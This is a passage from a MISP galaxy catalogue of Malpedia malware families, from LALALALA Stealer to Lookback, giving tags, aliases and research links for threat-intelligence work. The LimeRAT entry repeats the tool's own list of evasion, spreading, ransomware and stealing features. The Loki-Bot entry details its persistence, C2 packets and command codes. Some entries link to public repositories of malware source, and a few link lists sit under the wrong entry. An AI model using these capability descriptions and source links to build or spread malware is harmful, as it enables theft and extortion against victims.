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<td><a href="https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat">https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat</a></td>
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<tr>
<td><a href="https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/">https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia">https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia</a></td>
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**LALALALA Stealer**

The tag is: **misp-galaxy:malpedia="LALALALA Stealer"**

LALALALA Stealer is also known as:

**Table 1996. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer</a></td>
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<td><a href="https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html">https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/luc4m/status/1276477397102145538">https://twitter.com/luc4m/status/1276477397102145538</a></td>
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**Lambert**

The tag is: *misp-galaxy:malpedia=Lambert*

Lambert is also known as:

- Plexor

*Table 1997. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert">https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert</a></td>
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<td><a href="https://www.youtube.com/watch?v=jeLd-gw2bWo">https://www.youtube.com/watch?v=jeLd-gw2bWo</a></td>
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<tr>
<td><a href="https://ti.qianxin.com/blog/articles/network-weapons-of-cia/">https://ti.qianxin.com/blog/articles/network-weapons-of-cia/</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7">https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/">https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/</a></td>
</tr>
<tr>
<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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**Lamdelin**

The tag is: *misp-galaxy:malpedia=Lamdelin*

Lamdelin is also known as:

*Table 1998. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin">https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin</a></td>
</tr>
<tr>
<td><a href="http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/">http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/</a></td>
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**LatentBot**

The tag is: *misp-galaxy:malpedia=LatentBot*

LatentBot is also known as:

*Table 1999. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html">https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html</a></td>
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**Laturo Stealer**

The tag is: `misp-galaxy:malpedia="Laturo Stealer"`

Laturo Stealer is also known as:

*Table 2000. Table References*

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo">https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo</a></td>
</tr>
<tr>
<td><a href="https://seclists.org/snort/2019/q3/343">https://seclists.org/snort/2019/q3/343</a></td>
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**Laziok**

The tag is: `misp-galaxy:malpedia="Laziok"`

Laziok is also known as:

*Table 2001. Table References*

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok">https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok</a></td>
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**LazyCat**

The tag is: `misp-galaxy:malpedia="LazyCat"`

LazyCat is also known as:

*Table 2002. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat">https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/">https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/</a></td>
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</table>
**LCPDot**
The tag is: `misp-galaxy:malpedia="LCPDot"`
LCPDot is also known as:

*Table 2003. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot">https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot</a></td>
</tr>
<tr>
<td><a href="https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html">https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html</a></td>
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**Leakthemall Ransomware**
The tag is: `misp-galaxy:malpedia="Leakthemall Ransomware"`
Leakthemall Ransomware is also known as:

*Table 2004. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall">https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html">https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html</a></td>
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**Leash**
The tag is: `misp-galaxy:malpedia="Leash"`
Leash is also known as:

*Table 2005. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.leash">https://malpedia.caad.fkie.fraunhofer.de/details/win.leash</a></td>
</tr>
<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/</a></td>
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**Leouncia**
The tag is: `misp-galaxy:malpedia="Leouncia"`
Leouncia is also known as:

- shoco

*Table 2006. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
Lethic

Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.

The tag is: `misp-galaxy:malpedia="Lethic"`

Lethic is also known as:

Table 2007. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia">https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia</a></td>
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Liderc

The tag is: `misp-galaxy:malpedia="Liderc"`

Liderc is also known as:

Table 2008. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc">https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc</a></td>
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</table>

LightNeuron

The tag is: `misp-galaxy:malpedia="LightNeuron"`

LightNeuron is also known as:

- NETTRANS
- XTRANS

Table 2009. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron">https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron</a></td>
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</table>
Ligsterac

The tag is: `misp-galaxy:malpedia="Ligsterac"`

Ligsterac is also known as:

*Table 2010. Table References*

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac">https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/atm-infector/74772/">https://securelist.com/atm-infector/74772/</a></td>
</tr>
<tr>
<td><a href="http://atm.cybercrime-tracker.net/index.php">http://atm.cybercrime-tracker.net/index.php</a></td>
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</table>

Lilith

The tag is: `misp-galaxy:malpedia="Lilith"`

Lilith is also known as:

*Table 2011. Table References*

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith">https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith</a></td>
</tr>
<tr>
<td><a href="https://github.com/werkamsus/Lilith">https://github.com/werkamsus/Lilith</a></td>
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</tbody>
</table>

limedownloader

The tag is: `misp-galaxy:malpedia="limedownloader"`

limedownloader is also known as:

*Table 2012. Table References*
limeminer

The tag is: `misp-galaxy:malpedia="limeminer"`

limeminer is also known as:

Table 2013. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer">https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer</a></td>
</tr>
<tr>
<td><a href="https://github.com/NYAN-x-CAT/Lime-Miner">https://github.com/NYAN-x-CAT/Lime-Miner</a></td>
</tr>
</tbody>
</table>

LimeRAT

## Description

Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves.

### Main Features

- **.NET**
  - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0
- **Connection**
  - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports
- **Plugin**
  - Using plugin system to decrease stub's size and lower the AV detection
- **Encryption**
  - The communication between server & client is encrypted with AES
- **Spreading**
  - Infecting all files and folders on USB drivers
- **Bypass**
  - Low AV detection and undetected startup method
- **Lightweight**
• Payload size is about 25 KB
• **Anti Virtual Machines**
  • Uninstall itself if the machine is virtual to avoid scanning or analyzing
• **Ransomware**
  • Encrypting files on all HHD and USB with .Lime extension
• **XMR Miner**
  • High performance Monero CPU miner with user idle\active optimizations
• **DDoS**
  • Creating a powerful DDOS attack to make an online service unavailable
• **Crypto Stealer**
  • Stealing Cryptocurrency sensitive data
• **Screen-Locker**
  • Prevents user from accessing their Windows GUI
• **And more**
  • On Connect Auto Task
  • Force enable Windows RDP
  • Persistence
  • File manager
  • Passowrds stealer
  • Remote desktop
  • Bitcoin grabber
  • Downloader
  • Keylogger

The tag is: *misp-galaxy:malpedia="LimeRAT"

LimeRAT is also known as:

*Table 2014. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.youtube.com/watch?v=x-g-ZLeX8GM">https://www.youtube.com/watch?v=x-g-ZLeX8GM</a></td>
</tr>
<tr>
<td><a href="https://github.com/NYAN-x-CAT/Lime-RAT/">https://github.com/NYAN-x-CAT/Lime-RAT/</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/limerat-spreads-in-the-wild/">https://blog.yoroi.company/research/limerat-spreads-in-the-wild/</a></td>
</tr>
<tr>
<td><a href="https://blog.reversinglabs.com/blog/rats-in-the-library">https://blog.reversinglabs.com/blog/rats-in-the-library</a></td>
</tr>
</tbody>
</table>
Limitail

The tag is: misp-galaxy:malpedia="Limitail"

Limitail is also known as:

Table 2015. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail

LinseningSvr

The tag is: misp-galaxy:malpedia="LinseningSvr"

LinseningSvr is also known as:

Table 2016. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Listrix

The tag is: misp-galaxy:malpedia="Listrix"

Listrix is also known as:

Table 2017. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix

LiteDuke

According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be
compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.

The tag is: `misp-galaxy:malpedia="LiteDuke"`

LiteDuke is also known as:

**Table 2018. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke">https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke</a></td>
</tr>
<tr>
<td><a href="https://norfolkinfosec.com/looking-back-at-liteduke/">https://norfolkinfosec.com/looking-back-at-liteduke/</a></td>
</tr>
<tr>
<td><a href="https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/">https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/</a></td>
</tr>
</tbody>
</table>

**LiteHTTP**

According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.

The source is on GitHub: [https://github.com/zettabithf/LiteHTTP](https://github.com/zettabithf/LiteHTTP)

The tag is: `misp-galaxy:malpedia="LiteHTTP"`

LiteHTTP is also known as:

**Table 2019. Table References**

<table>
<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp">https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp</a></td>
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<td><a href="https://github.com/zettabithf/LiteHTTP">https://github.com/zettabithf/LiteHTTP</a></td>
</tr>
<tr>
<td><a href="https://viriback.com/recent-litehttp-activities-and-iocs/">https://viriback.com/recent-litehttp-activities-and-iocs/</a></td>
</tr>
<tr>
<td><a href="https://malware.news/t/recent-litehttp-activities-and-iocs/21053">https://malware.news/t/recent-litehttp-activities-and-iocs/21053</a></td>
</tr>
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</table>

**LockBit**

The tag is: `misp-galaxy:malpedia="LockBit"`

LockBit is also known as:

- ABCD Ransomware

**Table 2020. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit">https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit</a></td>
</tr>
</tbody>
</table>
LockerGoga

According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.

The tag is: *misp-galaxy:malpedia*="*LockerGoga*

LockerGoga is also known as:

*Table 2021. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga">https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga</a></td>
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<tr>
<td><a href="https://www.nrk.no/norge/skreddersyd-dobbeltangrep-mot-hydro-1.14480202">https://www.nrk.no/norge/skreddersyd-dobbeltangrep-mot-hydro-1.14480202</a></td>
</tr>
<tr>
<td><a href="https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes">https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes</a></td>
</tr>
<tr>
<td><a href="https://www.abuse.io/lockergoga.txt">https://www.abuse.io/lockergoga.txt</a></td>
</tr>
</tbody>
</table>
Locky

Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.

The tag is: **misp-galaxy:malpedia="Locky"**

Locky is also known as:

**Table 2022. Table References**

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.locky">https://malpedia.caad.fkie.fraunhofer.de/details/win.locky</a></td>
</tr>
<tr>
<td><a href="http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html">http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/">https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/</a></td>
</tr>
<tr>
<td><a href="https://dissectingmalwa.re/picking-locky.html">https://dissectingmalwa.re/picking-locky.html</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html">http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html</a></td>
</tr>
</tbody>
</table>
Locky (Decryptor)

The tag is: misp-galaxy:malpedia="Locky (Decryptor)"

Locky (Decryptor) is also known as:

Table 2023. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor

Locky Loader

For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.

The tag is: misp-galaxy:malpedia="Locky Loader"

Locky Loader is also known as:

Table 2024. Table References
LockPOS

The tag is: `misp-galaxy:malpedia="LockPOS"`

LockPOS is also known as:

Table 2025. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader</a></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos">https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos</a></td>
</tr>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/">https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/</a></td>
</tr>
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</table>

Loda

Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.

The tag is: `misp-galaxy:malpedia="Loda"`

Loda is also known as:

- LodaRAT
- Nymeria

Table 2026. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.loda">https://malpedia.caad.fkie.fraunhofer.de/details/win.loda</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html">https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html">https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html</a></td>
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LODEINFO

The tag is: `misp-galaxy:malpedia=“LODEINFO”`

LODEINFO is also known as:

Table 2027. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo">https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo</a></td>
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<tr>
<td><a href="https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html">https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html</a></td>
</tr>
<tr>
<td><a href="https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html">https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/jpcert_ac/status/1351355443730255872">https://twitter.com/jpcert_ac/status/1351355443730255872</a></td>
</tr>
<tr>
<td><a href="https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html">https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html</a></td>
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Logedrut

The tag is: `misp-galaxy:malpedia=“Logedrut”`

Logedrut is also known as:

Table 2028. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut">https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut</a></td>
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LogPOS

The tag is: `misp-galaxy:malpedia=“LogPOS”`

LogPOS is also known as:

Table 2029. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos</a></td>
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LoJax

The tag is: misp-galaxy:malpedia="LoJax"

LoJax is also known as:

Table 2030. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax">https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=VeoXT0nEcFU">https://www.youtube.com/watch?v=VeoXT0nEcFU</a></td>
</tr>
</tbody>
</table>

Loki Password Stealer (PWS)

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123”.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\ C98066”.

There can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:

FILE EXTENSION FILE DESCRIPTION .exe A copy of the malware that will execute every time the user account is logged into .lck A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts .hdb A database of hashes for data that has already been exfiltrated to the C2 server .kdb A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.
The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

<table>
<thead>
<tr>
<th>BYTE PAYLOAD TYPE</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x26</td>
<td>Stolen Cryptocurrency Wallet</td>
</tr>
<tr>
<td>0x27</td>
<td>Stolen Application Data</td>
</tr>
<tr>
<td>0x28</td>
<td>Get C2 Commands from C2 Server</td>
</tr>
<tr>
<td>0x29</td>
<td>Stolen File</td>
</tr>
<tr>
<td>0x2A</td>
<td>POS (Point of Sale?)</td>
</tr>
<tr>
<td>0x2B</td>
<td>Keylogger Data</td>
</tr>
<tr>
<td>0x2C</td>
<td>Screenshot</td>
</tr>
</tbody>
</table>

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

<table>
<thead>
<tr>
<th>BYTE INSTRUCTION</th>
<th>DESCRIPTION</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>Download EXE &amp; Execute</td>
</tr>
<tr>
<td>0x01</td>
<td>Download DLL &amp; Load #1</td>
</tr>
<tr>
<td>0x02</td>
<td>Download DLL &amp; Load #2</td>
</tr>
<tr>
<td>0x08</td>
<td>Delete HDB File</td>
</tr>
<tr>
<td>0x09</td>
<td>Start Keylogger</td>
</tr>
<tr>
<td>0x0A</td>
<td>Mine &amp; Steal Data</td>
</tr>
<tr>
<td>0x0E</td>
<td>Exit Loki-Bot</td>
</tr>
<tr>
<td>0x10</td>
<td>Change C2 Polling Frequency</td>
</tr>
<tr>
<td>0x11</td>
<td>Delete Executables &amp; Exit</td>
</tr>
</tbody>
</table>

Suricata Signatures

The tag is: `misp-galaxy:malpedia="Loki Password Stealer (PWS)"`

Loki Password Stealer (PWS) is also known as:

- Loki
- LokiBot
## LokiPWS

### Table 2031. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws">https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws</a></td>
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<td><a href="https://isc.sans.edu/diary/24372">https://isc.sans.edu/diary/24372</a></td>
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<td><a href="http://www.malware-traffic-analysis.net/2017/06/12/index.html">http://www.malware-traffic-analysis.net/2017/06/12/index.html</a></td>
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<td><a href="https://github.com/R3MRUM/loki-parse">https://github.com/R3MRUM/loki-parse</a></td>
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<td><a href="https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/">https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/</a></td>
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<td><a href="https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850">https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850</a></td>
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<td><a href="https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/">https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/</a></td>
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<td><a href="https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/">https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/</a></td>
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<td><a href="https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2">https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2</a></td>
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<td><a href="https://lab52.io/blog/a-twisted-malware-infection-chain/">https://lab52.io/blog/a-twisted-malware-infection-chain/</a></td>
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<tr>
<td><a href="https://news.sophos.com/en-us/2020/05/14/raticate/">https://news.sophos.com/en-us/2020/05/14/raticate/</a></td>
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<td><a href="https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html">https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html</a></td>
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<tr>
<td><a href="https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/">https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/</a></td>
</tr>
<tr>
<td><a href="https://blog.prevalion.com/2020/02/the-triune-threat-mastermana-returns.html">https://blog.prevalion.com/2020/02/the-triune-threat-mastermana-returns.html</a></td>
</tr>
<tr>
<td><a href="https://www.lastline.com/blog/password-stealing-malware-loki-bot/">https://www.lastline.com/blog/password-stealing-malware-loki-bot/</a></td>
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LOLSnif

The tag is: *misp-galaxy:malpedia="LOLSnif"*

LOLSnif is also known as:

**Table 2032. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif">https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif</a></td>
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<tr>
<td><a href="https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63">https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63</a></td>
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<td><a href="https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/">https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/</a></td>
</tr>
<tr>
<td><a href="https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/">https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/</a></td>
</tr>
</tbody>
</table>

LONGWATCH

The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

The tag is: *misp-galaxy:malpedia="LONGWATCH"*

LONGWATCH is also known as:

**Table 2033. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch">https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch</a></td>
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</tbody>
</table>

loochiper Ransomware

LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure,
Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straightforward, not very different from those belonging to many other ransomware families.

The tag is: *misp-galaxy:malpedia="looChiper Ransomware"*

looChiper Ransomware is also known as:

*Table 2034. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper">https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper</a></td>
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<tr>
<td><a href="https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool">https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/">https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/</a></td>
</tr>
<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html">https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html</a></td>
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**Lookback**

The tag is: *misp-galaxy:malpedia="Lookback"*

Lookback is also known as:

*Table 2035. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback">https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback</a></td>
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<td><a href="https://nao-sec.org/2021/01/royal-road-redive.html">https://nao-sec.org/2021/01/royal-road-redive.html</a></td>
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<tr>
<td><a href="https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape">https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape</a></td>
</tr>
</tbody>
</table>

